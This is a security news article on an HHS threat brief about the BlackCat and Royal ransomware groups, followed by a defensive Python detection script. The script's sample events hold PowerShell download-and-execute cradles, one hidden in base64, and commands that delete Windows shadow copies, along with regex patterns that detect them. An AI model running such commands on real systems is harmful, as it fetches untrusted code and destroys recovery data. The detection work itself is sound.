Healthcare entities should be on high alert for signs of the BlackCat and Royal ransomware-as-a-service groups, warns the U.S. government, which characterizes the groups as “relatively new but highly capable” threats.
The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center in a Thursday threat brief warns that BlackCat conducts triple extortion, meaning it doesn’t just maliciously encrypt data and demand an extortion payment, but also threatens to leak the stolen data and to conduct distributed denial-of-service attacks against victims if they don’t pay up. Royal hews to the now more traditional double-extortion method of demanding a ransom payment backed by the threat of publishing stolen data.
Each group has roots in earlier ransomware groups. BlackCat, also known as Alphv, is suspected of being a successor group to Darkside and BlackMatter, with ties to some former REvil members, and Royal is known to have former operators from cybercriminal group Conti Team One.
BlackCat asserts that it doesn’t target healthcare providers, but “they have also been open about the fact that insurance companies, pharmaceutical companies, and others are not providers – so it’s important not to let statements like ‘BlackCat does not target healthcare,’ make us complacent,” says Erick Galinkin, principal artificial intelligence researcher at security firm Rapid7.
Royal doesn’t have BlackCat’s stated compunctions about targeting healthcare providers. “Royal is a particularly nasty strain of ransomware and features a significant number of evasion techniques,” Galinkin says.
The BlackCat ransomware-as-a-service group has demanded ransom payments as high as $1.5 million, and affiliates keep 80% to 90% of the extortion payments. “BlackCat tooling is constantly changing as they cycle through testing/usage, updating their arsenal frequently,” the alert says.
Security researchers have also found BlackCat attackers using a PowerShell command to download Cobalt Strike beacons on some affected systems, as well as pen-testing tool Brute Ratel, which has “Cobalt Strike-like remote access features” (see: BlackCat Adds Brute Ratel Pentest Tool to Attack Arsenal).
BlackCat uses two encryption algorithms – ChaCha20 and AES – and six encryption modes: Full, HeadOnly, DotPattern, SmartPattern, AdvancedSmartPattern and Auto. Only the Full mode encrypts an entire file; the others encrypt selected regions of each file, such as the header or a pattern of blocks, which speeds up the attack and means that defenses expecting whole-file rewrites can underestimate how much data has been rendered unreadable.
BlackCat’s latest ransomware, written in the memory-safe, multiplatform language Rust, provides a lot of flexibility and power to the group, Galinkin says.
Alpha Spider, a developer and operator in the BlackCat ransomware-as-a-service network active since late 2021, was one of the most prolific ransomware operators of 2022, says Adam Meyers, senior vice president of intelligence at security firm CrowdStrike.
Royal was also the subject of a separate HHS HC3 security alert in December that cautioned the healthcare sector about surging ransomware attacks across the globe, with U.S. entities a top target (see: Royal Ransomware Hitting Healthcare Targets and Dumping Data).
The new HHS HC3 alert says that in September, researchers observed that Royal’s developers had begun using other groups’ encryptors, including one from BlackCat, before switching to their own encryptor, called Zeon. HC3 says the group later renamed its encryptor Royal. Before encrypting, the ransomware deletes all volume shadow copies, the point-in-time snapshots Windows keeps for file and system restore, the alert says, which removes the quickest local recovery option and is why shadow-copy deletion is one of the most reliable early signs of a ransomware deployment in progress.
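Two of the behaviors described in this piece, PowerShell being used to download Cobalt Strike beacons and the deletion of shadow copies ahead of encryption, are both visible in ordinary process-creation telemetry. What follows is an added example, not code from the HC3 brief or from any vendor quoted here: a small set of detection rules in Python run over constructed Sysmon-style process events. The event lines, the command-line patterns the rules look for, the rule names and the 198.51.100.0/24 addresses (a documentation range) are all assumptions made for the illustration. The part worth copying is that the PowerShell rule decodes -EncodedCommand payloads before matching, since a cradle hidden behind base64 is exactly the form a plain string search on the command line misses.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


def encode_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way powershell.exe expects it
    (base64 over the UTF-16LE bytes of the script). Used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon-style process-creation records (Event ID 1 fields flattened to
# "key=value | key=value"). These are made-up events, not from any real incident, and
# 198.51.100.0/24 is a documentation range, so the URLs are inert. The last event is a
# download cradle hidden behind -enc.
ENCODED_CRADLE = encode_powershell(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/b')"
)
SAMPLE_EVENTS = [
    r"ts=2023-01-12T14:03:11Z | parent=C:\Windows\explorer.exe | image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd=powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://198.51.100.23/a'))",
    r"ts=2023-01-12T14:05:40Z | parent=C:\Windows\System32\svchost.exe | image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd=powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    r"ts=2023-01-12T14:09:02Z | parent=C:\Users\jdoe\AppData\Local\Temp\setup.exe | image=C:\Windows\System32\vssadmin.exe | cmd=vssadmin.exe delete shadows /all /quiet",
    r"ts=2023-01-12T14:09:03Z | parent=C:\Users\jdoe\AppData\Local\Temp\setup.exe | image=C:\Windows\System32\wbem\WMIC.exe | cmd=wmic shadowcopy delete",
    r"ts=2023-01-12T14:15:27Z | parent=C:\Windows\System32\cmd.exe | image=C:\Windows\System32\vssadmin.exe | cmd=vssadmin.exe list shadows",
    rf"ts=2023-01-12T14:20:51Z | parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd=powershell.exe -w hidden -enc {ENCODED_CRADLE}",
]

POWERSHELL_IMAGE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)
# Network-fetch primitives commonly seen in download cradles (assumed list, not from the alert).
FETCH = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b"
    r"|Net\.WebClient|Start-BitsTransfer", re.I)
# In-memory execution primitives that turn a fetch into a loader.
EXECUTE = re.compile(r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I)
# powershell.exe accepts -EncodedCommand as -e, -ec or -enc; the argument is base64.
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Common ways of removing shadow copies; "vssadmin list shadows" deliberately does not match.
SHADOW_DELETE = [
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"vssadmin(?:\.exe)?\s+resize\s+shadowstorage", re.I),  # shrinking storage evicts copies
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"Win32_ShadowCopy.*(?:Remove-WmiObject|Remove-CimInstance|\.Delete\(\))", re.I),
]


@dataclass
class Finding:
    rule: str
    severity: str
    ts: str
    parent: str
    image: str
    cmd: str
    note: str = ""


def parse_event(line: str) -> Dict[str, str]:
    """Split 'key=value | key=value' into a dict; the first '=' separates key from value."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand payload, or None if there is none."""
    match = ENCODED.search(cmd)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def _finding(rule: str, severity: str, ev: Dict[str, str], note: str = "") -> Finding:
    return Finding(rule, severity, ev.get("ts", ""), ev.get("parent", ""),
                   ev.get("image", ""), ev.get("cmd", ""), note)


def check_powershell(ev: Dict[str, str]) -> Optional[Finding]:
    """Flag PowerShell download cradles; a fetch plus in-memory execution is rated high."""
    if not POWERSHELL_IMAGE.search(ev.get("image", "")):
        return None
    cmd = ev.get("cmd", "")
    decoded = decode_encoded_command(cmd)
    # Match against the decoded script as well, so -enc cannot hide the cradle.
    text = cmd if decoded is None else cmd + " " + decoded
    fetch, execute = bool(FETCH.search(text)), bool(EXECUTE.search(text))
    note = "" if decoded is None else "decoded -EncodedCommand: " + decoded
    if fetch:
        return _finding("powershell_download_cradle", "high" if execute else "medium", ev, note)
    if decoded is not None:
        return _finding("powershell_encoded_command", "medium", ev, note)
    return None


def check_shadow_copies(ev: Dict[str, str]) -> Optional[Finding]:
    """Flag shadow-copy removal regardless of which binary was used to do it."""
    cmd = ev.get("cmd", "")
    for pattern in SHADOW_DELETE:
        if pattern.search(cmd):
            return _finding("shadow_copy_deletion", "high", ev, "matched " + pattern.pattern)
    return None


def detect(lines: List[str]) -> List[Finding]:
    """Run every rule over every event and return the findings in event order."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        for check in (check_powershell, check_shadow_copies):
            finding = check(ev)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule} ts={f.ts} parent={f.parent}\n    {f.cmd[:120]}")
        if f.note:
            print("    " + f.note)
```

Run against the sample set, the rules fire four times: the two cradles (the clear-text one and the base64-encoded one, which is reported with its decoded script), and the vssadmin and WMIC shadow-copy deletions spawned from an installer in a user's Temp directory; the benign inventory script and the `vssadmin list shadows` lookup stay quiet. In production these patterns would live in Sigma rules or an EDR query rather than a script, and the parent process is worth keeping in every alert, because an Office document or a freshly downloaded installer launching PowerShell or vssadmin is the context that turns a noisy match into a real lead.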
Ransom demands in Royal attacks have ranged from $250,000 to more than $2 million. Royal delivery methods include using Google Ads in a campaign to blend in with normal ad traffic, making malicious downloads appear authentic by hosting fake installer files on legitimate-looking software download sites and using contact forms located on an organization’s website to distribute phishing links.
Royal is a multithreaded ransomware that uses a unique approach to evade anti-ransomware defenses. The group operates globally.
“The good news is that in general, these threat actors are still using well-known loaders like QBot, and use back doors like Cobalt Strike for persistence and command and control,” Galinkin says. “This means that a solid defense-in-depth strategy designed to detect these sorts of common techniques and make lateral movement difficult will be effective in preventing the operations of these actors in the network, no matter how impressive the malware itself is,” he says.
Nonetheless, “the things we know we should do like network segmentation, egress filtering, and separation of privileges often fall to the wayside given the time demands of our profession,” he says. “But these building blocks provide some of the most robust protection against ransomware gangs, even as they evolve their tactics.”